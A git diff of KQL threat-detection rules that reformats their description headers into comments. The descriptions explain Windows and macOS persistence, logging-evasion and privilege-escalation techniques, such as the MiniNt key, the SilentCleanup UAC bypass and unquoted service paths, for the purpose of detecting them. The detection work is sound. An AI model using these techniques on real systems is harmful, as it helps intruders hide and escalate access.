a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql index e8da8e44..ff0b870a 100644 --- a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql +++ b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql @@ -3,12 +3,11 @@ // Date: 2022-07-21 // Level: medium // Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. -The disk cleanup manager is part of the operating system. It displays the dialog box […] -The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. -Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. -Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. -Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. - +// The disk cleanup manager is part of the operating system. It displays the dialog box […] +// The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. +// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. +// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. +// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. // MITRE Tactic: Persistence // Tags: attack.persistence // False Positives: diff --git a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql index dab9596b..77025f5f 100644 --- a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql +++ b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql @@ -3,8 +3,7 @@ // Date: 2022-07-21 // Level: high // Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. -The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. - +// The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. // MITRE Tactic: Persistence // Tags: attack.persistence // False Positives: diff --git a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql index 6f4c3d7e..5fe0eea1 100644 --- a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql +++ b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql @@ -3,8 +3,7 @@ // Date: 2019-01-16 // Level: medium // Description: Detects installation of a new shim using sdbinst.exe. -Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims - +// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011 diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql index 0a3db4bb..1b55b96f 100644 --- a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql +++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-12-21 // Level: medium // Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. -This is a common technique used by malware to change the desktop background to a ransom note or other image. - +// This is a common technique used by malware to change the desktop background to a ransom note or other image. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001 // False Positives: diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql index 3620513c..cc991980 100644 --- a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql +++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql @@ -3,8 +3,7 @@ // Date: 2023-12-21 // Level: medium // Description: Detects registry value settings that would replace the user's desktop background. -This is a common technique used by malware to change the desktop background to a ransom note or other image. - +// This is a common technique used by malware to change the desktop background to a ransom note or other image. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001 // False Positives: diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql index 613c08f2..e0f8d060 100644 --- a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql +++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql @@ -3,7 +3,6 @@ // Date: 2017-03-19 // Level: high // Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.command-and-control, attack.t1571 diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql index 88a88ae5..6b9b71f8 100644 --- a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql +++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql @@ -3,7 +3,6 @@ // Date: 2024-05-10 // Level: high // Description: Detects programs that connect to known malware callback ports based on threat intelligence reports. - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.command-and-control, attack.t1571 diff --git a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql index a69d2037..65577a7d 100644 --- a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql +++ b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql @@ -3,8 +3,7 @@ // Date: 2023-05-05 // Level: high // Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. -Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards. - +// Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.t1068 // False Positives: diff --git a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql index 7b51cf2f..41a02e7d 100644 --- a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql +++ b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql @@ -3,8 +3,7 @@ // Date: 2022-07-21 // Level: medium // Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. -You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. - +// You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. // MITRE Tactic: Persistence // Tags: attack.persistence // False Positives: diff --git a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql index 1f0aaf0a..9acd1ea3 100644 --- a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql +++ b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql @@ -3,9 +3,8 @@ // Date: 2025-07-30 // Level: medium // Description: Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class. -This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe. -Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands. - +// This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe. +// Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.discovery, attack.t1047, attack.t1112, attack.t1012 // False Positives: diff --git a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql index 12c4e84e..63172d2a 100644 --- a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql +++ b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql @@ -3,7 +3,6 @@ // Date: 2024-09-02 // Level: medium // Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel. - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql index 55485657..824167a2 100644 --- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql +++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql @@ -3,8 +3,7 @@ // Date: 2024-03-11 // Level: low // Description: Detects the command line executed when TeamViewer starts a session started by a remote host. -Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. - +// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.initial-access, attack.t1133 // False Positives: diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql index 65bc92f3..09ce1d7b 100644 --- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql +++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql @@ -3,8 +3,7 @@ // Date: 2024-03-11 // Level: low // Description: Detects the command line executed when TeamViewer starts a session started by a remote host. -Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. - +// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.initial-access, attack.t1133 // False Positives: diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql index b101c7c0..9e3f57aa 100644 --- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql +++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql @@ -3,8 +3,7 @@ // Date: 2024-03-11 // Level: low // Description: Detects the command line executed when TeamViewer starts a session started by a remote host. -Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. - +// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.initial-access, attack.t1133 // False Positives: diff --git a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql index 80578c80..05e6c37f 100644 --- a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql +++ b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql @@ -3,8 +3,7 @@ // Date: 2020-05-02 // Level: medium // Description: Detects any deletion of entries in ".*\shell\open\command" registry keys. -These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks. - +// These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1112 // False Positives: diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql index 1c40d43f..fafaffef 100644 --- a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql +++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql @@ -3,9 +3,8 @@ // Date: 2023-01-13 // Level: high // Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. -RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. -This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise - +// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. +// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1112 diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql index 382a86be..aa1efd7c 100644 --- a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql +++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql @@ -3,9 +3,8 @@ // Date: 2023-01-13 // Level: high // Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. -RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. -This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise - +// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. +// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1112 diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql index 33fe2edb..40bb3976 100644 --- a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql +++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql @@ -3,9 +3,8 @@ // Date: 2025-04-09 // Level: high // Description: Detects attempts to disable security event logging by adding the `MiniNt` registry key. -This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications. -Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities. - +// This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications. +// Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001 // False Positives: diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql index 3d5077f1..af522520 100644 --- a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql +++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql @@ -3,9 +3,8 @@ // Date: 2025-04-09 // Level: high // Description: Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events. -Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing. -Adversary may want to disable this service to disable logging of security events which could be used to detect their activities. - +// Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing. +// Adversary may want to disable this service to disable logging of security events which could be used to detect their activities. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001 // False Positives: diff --git a/KQL/rules/Persistence/servicedll_hijack.kql b/KQL/rules/Persistence/servicedll_hijack.kql index 7c54ba65..0ebe5ce0 100644 --- a/KQL/rules/Persistence/servicedll_hijack.kql +++ b/KQL/rules/Persistence/servicedll_hijack.kql @@ -3,8 +3,7 @@ // Date: 2022-02-04 // Level: medium // Description: Detects changes to the "ServiceDLL" value related to a service in the registry. -This is often used as a method of persistence. - +// This is often used as a method of persistence. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 // False Positives: diff --git a/KQL/rules/Persistence/startup_item_file_created_macos.kql b/KQL/rules/Persistence/startup_item_file_created_macos.kql index 1df6ef62..c1543493 100644 --- a/KQL/rules/Persistence/startup_item_file_created_macos.kql +++ b/KQL/rules/Persistence/startup_item_file_created_macos.kql @@ -3,9 +3,8 @@ // Date: 2020-10-14 // Level: low // Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence. -Adversaries may use startup items automatically executed at boot initialization to establish persistence. -Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. - +// Adversaries may use startup items automatically executed at boot initialization to establish persistence. +// Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.t1037.005 // False Positives: diff --git a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql index 894d04d5..1eb691f2 100644 --- a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql +++ b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql @@ -3,8 +3,7 @@ // Date: 2025-10-20 // Level: medium // Description: Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. -This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts. - +// This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.t1505.003, attack.initial-access, attack.t1190 diff --git a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql index 5ac1d12c..ec98b945 100644 --- a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql +++ b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql @@ -3,7 +3,6 @@ // Date: 2019-01-16 // Level: high // Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.initial-access, attack.t1505.003, attack.t1190 // False Positives: diff --git a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql index ad351cb9..01395494 100644 --- a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql +++ b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql @@ -3,8 +3,7 @@ // Date: 2021-08-19 // Level: medium // Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. -Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension - +// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002 // False Positives: diff --git a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql index 9d6e36d2..34a9f69f 100644 --- a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql +++ b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql @@ -3,9 +3,8 @@ // Date: 2020-10-06 // Level: medium // Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. -This allows to create values in the registry and install drivers. -For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys - +// This allows to create values in the registry and install drivers. +// For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1112 // False Positives: diff --git a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql index a0f6f88c..5a550630 100644 --- a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql +++ b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql @@ -3,8 +3,7 @@ // Date: 2025-06-17 // Level: high // Description: Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification. -This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC. - +// This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.007, attack.t1548.002 // False Positives: diff --git a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql index e0664bca..ade7cbe0 100644 --- a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql +++ b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-08-01 // Level: medium // Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. -Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims - +// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011 diff --git a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql index d6174c64..be1916c4 100644 --- a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql +++ b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql @@ -3,9 +3,8 @@ // Date: 2019-08-25 // Level: high // Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from -HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. -This is usually used with UseLogonCredential to manipulate the caching credentials. - +// HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. +// This is usually used with UseLogonCredential to manipulate the caching credentials. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1112 diff --git a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql index f3b27cb8..1434620c 100644 --- a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql +++ b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql @@ -3,7 +3,6 @@ // Date: 2022-03-17 // Level: high // Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 // False Positives: diff --git a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql index f94bdfd8..839d3e99 100644 --- a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql +++ b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql @@ -3,7 +3,6 @@ // Date: 2020-07-22 // Level: high // Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.t1505.003 diff --git a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql index 14eacb11..6eda5468 100644 --- a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql +++ b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql @@ -3,9 +3,8 @@ // Date: 2022-09-09 // Level: medium // Description: Detects when the 'AllowMultipleTSSessions' value is enabled. -Which allows for multiple Remote Desktop connection sessions to be opened at once. -This is often used by attacker as a way to connect to an RDP session without disconnecting the other users - +// Which allows for multiple Remote Desktop connection sessions to be opened at once. +// This is often used by attacker as a way to connect to an RDP session without disconnecting the other users // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1112 // False Positives: diff --git a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql index fca1812a..9b430f8c 100644 --- a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql +++ b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql @@ -3,8 +3,7 @@ // Date: 2021-12-30 // Level: medium // Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. -A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. - +// A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql index 6a19b8be..150fd39b 100644 --- a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql +++ b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql @@ -3,9 +3,8 @@ // Date: 2022-01-06 // Level: high // Description: Detects the setting of the environement variable "windir" to a non default value. -Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. -The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC. - +// Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. +// The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql index 7382ef34..4514039e 100644 --- a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql +++ b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql @@ -3,8 +3,7 @@ // Date: 2022-06-28 // Level: high // Description: Detects when a program changes the default file association of any extension to an executable. -When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. - +// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001 diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql index b8ab39a8..d54b7eed 100644 --- a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql +++ b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql @@ -3,8 +3,7 @@ // Date: 2019-10-21 // Level: low // Description: Detects file association changes using the builtin "assoc" command. -When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. - +// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001 // False Positives: diff --git a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql index 84d3564d..7f8d9a58 100644 --- a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql +++ b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql @@ -3,9 +3,8 @@ // Date: 2021-12-30 // Level: medium // Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. -Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. -Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services - +// Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. +// Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.011 diff --git a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql index 01284022..748895b6 100644 --- a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql +++ b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql @@ -3,8 +3,7 @@ // Date: 2021-12-30 // Level: high // Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. -Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. - +// Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's 